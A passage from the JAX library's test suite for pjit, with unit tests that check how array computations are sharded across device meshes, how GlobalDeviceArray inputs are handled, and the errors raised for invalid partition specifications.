x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
@partial(pjit,
in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise unittest.SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
# Re-create the mesh to make sure that it has no influence on caching
with mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@check_1d_2d_mesh(set_mesh=True)
def testAutodiff(self, mesh, resources):
if len(mesh) != 2: return
assert resources == ('x', 'y')
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum(1) * h.sum(),
in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
order=2)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
rule = xla._translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla._translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla._translations[pjit_p] = rule
@jtu.with_mesh([('x', 2)])
def testLowerWithDuckTyping(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
# Make sure this doesn't crash
pjit(lambda x: x + 4,
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
@jtu.with_mesh([('x', 2)])
def testLowerDonateArgnumsAvailable(self):
x = jax.ShapeDtypeStruct((2, 2), jnp.float32)
def f(*args):
x, *_ = args
return x
f_low = pjit(f, donate_argnums=(0,),
in_axis_resources=P('x'), out_axis_resources=P('x')).lower(x)
f_com = f_low.compile()
self.assertTrue(f_low.donate_argnums == f_com.donate_argnums == (0,))
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
logging.info('Transferring to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
logging.info('Transferring to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :],))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
logging.info('Transferring from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
@jtu.with_mesh([('x', 2)])
def testWithCustomPRNGKey(self):
if not config.jax_enable_custom_prng:
raise unittest.SkipTest("test requires jax_enable_custom_prng")
key = jax.prng.seed_with_impl(jax.prng.rbg_prng_impl, 87)
# Make sure this doesn't crash
pjit(lambda x: x, in_axis_resources=(None), out_axis_resources=(None))(key)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompile(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
expected = x @ (x + 1)
exe = f.lower(x, x + 1).compile()
actual = exe(x, x + 1)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileWithKwargs(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y, **kwargs):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
NotImplementedError,
"function was compiled by a transformation that does not support "
"keyword arguments, but called with keyword arguments: a, b",
lambda: exe(x, x + 1, a=1, b=2))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileInTreeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
exe = f.lower(x, x + 1).compile()
self.assertRaisesRegex(
TypeError, "function compiled for .*, called with .*",
lambda: exe([x], [x + 1]))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLowerCompileArgTypeMismatch(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
x_f32 = x.astype(jnp.float32)
x_i32 = x.astype(jnp.int32)
exe = f.lower(x_f32, x_f32).compile()
self.assertRaisesRegex(
TypeError,
"Computation compiled for input types:\n.*float32.*\n"
"called with:\n.*int32.*",
lambda: exe(x_i32, x_i32))
class GDAPjitTest(jtu.JaxTestCase):
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_single_output(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x @ x.T
expected_matrix_mul = input_data @ input_data.T
out = f(gda_obj)
self.assertIsInstance(out, global_device_array.GlobalDeviceArray)
self.assertEqual(out.shape, (8, 8))
self.assertEqual(out.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out._global_mesh.shape, {'x': 4, 'y': 2})
for s in out.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
with self.assertRaisesRegex(
ValueError, ('For a non-GDA input, the corresponding resource in '
'in_axis_resources cannot be `pjit.FROM_GDA`.')):
f(input_data)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_multi_input_multi_output(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
mesh_axes1 = P('x', 'y')
gda1 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes1, cb)
mesh_axes2 = P('x')
gda2 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes2, cb)
mesh_axes3 = P(('x', 'y'))
gda3 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes3, cb)
mesh_axes4 = P(None)
gda4 = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes4, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(
pjit,
# `FROM_GDA` will be replicated for all the inputs.
in_axis_resources=FROM_GDA,
out_axis_resources=(mesh_axes1, mesh_axes4, mesh_axes2, mesh_axes3))
def f(x, y, z, a):
return x @ x.T, y, z, a
out1, out2, out3, out4 = f(gda1, gda2, gda3, gda4)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertEqual(out1.local_shards[0].index, (slice(0, 2), slice(0, 4)))
self.assertEqual(out1.local_shards[1].index, (slice(0, 2), slice(4, 8)))
self.assertListEqual([s.replica_id for s in out1.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
expected_matrix_mul = input_data @ input_data.T
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 2))
self.assertEqual(out2.local_shards[0].data.shape, (8, 2))
self.assertEqual(out2.local_shards[0].index, (slice(None), slice(None)))
self.assertEqual(out2.local_shards[1].index, (slice(None), slice(None)))
self.assertListEqual([s.replica_id for s in out2.local_shards],
[0, 1, 2, 3, 4, 5, 6, 7])
for s in out2.local_shards:
self.assertArraysEqual(s.data, input_data)
self.assertIsInstance(out3, global_device_array.GlobalDeviceArray)
self.assertEqual(out3.shape, (8, 2))
self.assertEqual(out3.local_shards[0].data.shape, (2, 2))
self.assertEqual(out3.local_shards[0].index, (slice(0, 2), slice(None)))
self.assertEqual(out3.local_shards[1].index, (slice(0, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out3.local_shards],
[0, 1, 0, 1, 0, 1, 0, 1])
for s in out3.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
self.assertIsInstance(out4, global_device_array.GlobalDeviceArray)
self.assertEqual(out4.shape, (8, 2))
self.assertEqual(out4.local_shards[0].data.shape, (1, 2))
self.assertEqual(out4.local_shards[0].index, (slice(0, 1), slice(None)))
self.assertEqual(out4.local_shards[1].index, (slice(1, 2), slice(None)))
self.assertListEqual([s.replica_id for s in out4.local_shards],
[0, 0, 0, 0, 0, 0, 0, 0])
for s in out4.local_shards:
self.assertArraysEqual(s.data, input_data[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_mixed_inputs(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(global_input_shape)).reshape(global_input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(FROM_GDA, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(gda_obj, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_non_gda_inputs(self):
input_shape = (8, 2)
input_data = np.arange(prod(input_shape)).reshape(input_shape)
with jax._src.config.parallel_functions_output_gda(True):
@partial(pjit,
in_axis_resources=(None, P('x', 'y')),
out_axis_resources=(P('x', 'y'), P(('x', 'y'))))
def f(x, y):
return x @ x.T, y @ y.T
expected_matrix_mul = input_data @ input_data.T
out1, out2 = f(input_data, input_data)
self.assertIsInstance(out1, global_device_array.GlobalDeviceArray)
self.assertEqual(out1.shape, (8, 8))
self.assertEqual(out1.local_shards[0].data.shape, (2, 4))
self.assertDictEqual(out1._global_mesh.shape, {'x': 4, 'y': 2})
for s in out1.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
self.assertIsInstance(out2, global_device_array.GlobalDeviceArray)
self.assertEqual(out2.shape, (8, 8))
self.assertEqual(out2.local_shards[0].data.shape, (1, 8))
self.assertDictEqual(out2._global_mesh.shape, {'x': 4, 'y': 2})
for s in out2.local_shards:
self.assertArraysEqual(s.data, expected_matrix_mul[s.index])
@jtu.with_mesh([('x', 2), ('y', 2)])
def test_pjit_gda_mesh_mismatch(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x', 'y']
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesRegex(ValueError,
"Pjit's mesh and GDA's mesh should be equal."):
@partial(pjit, in_axis_resources=FROM_GDA, out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_wrong_resource_for_gda_input(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = ['x']
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
with self.assertRaisesWithLiteralMatch(
ValueError,
"Got an input GDA to pjit with different partitioning than specified "
'in the in_axis_resources argument to pjit. The partitioning must '
'match, or use `jax.experimental.pjit.FROM_GDA` in `in_axis_resources`. '
"Got GDA spec: PartitionSpec('x',) and "
"pjit spec: PartitionSpec('x', 'y') "
'for GDA: GlobalDeviceArray(shape=(8, 2), dtype=float32)'):
@partial(pjit, in_axis_resources=P('x', 'y'), out_axis_resources=P('x', 'y'))
def f(x):
return x
f(gda_obj)
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_pjit_gda_caching(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
input_shape = (8, 2)
mesh_axes = P('x', 'y')
input_data = np.arange(
prod(input_shape), dtype=np.float32).reshape(input_shape)
def cb(index):
return input_data[index]
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
input_shape, global_mesh, mesh_axes, cb)
trace_counter = [0]
@partial(pjit, in_axis_resources=mesh_axes, out_axis_resources=P('x', 'y'))
def f(x, y):
trace_counter[0] += 1
return x @ y.T
f(gda_obj, gda_obj)
self.assertListEqual(trace_counter, [1])
f(gda_obj, gda_obj)
self.assertListEqual(trace_counter, [1])
f(input_data, input_data)
self.assertListEqual(trace_counter, [2])
f(gda_obj, input_data)
self.assertListEqual(trace_counter, [3])
@jtu.with_mesh([('x', 4), ('y', 2)])
def test_partition_spec_mismatch_semantically_equivalent(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = [None]
global_input_data = np.arange(
prod(global_input_shape), dtype=np.float32).reshape(global_input_shape)
def cb(index):
return global_input_data[index]
with jax._src.config.parallel_functions_output_gda(True):
gda_obj = global_device_array.GlobalDeviceArray.from_callback(
global_input_shape, global_mesh, mesh_axes, cb)
@partial(pjit, in_axis_resources=P(None), out_axis_resources=P(None))
def f(x):
return x
output_gda = f(gda_obj)
# Ensure output_gda._mesh_axes = P() is matched with P(None).
self.assertEqual(output_gda._mesh_axes, ())
# P(None) is in_axis_resources.
f(output_gda)
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleConstraint(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources,)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r".*implies that the size of "
r"its dimension 0 should be divisible by " + mesh_size +
r", but it is equal to 3"):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
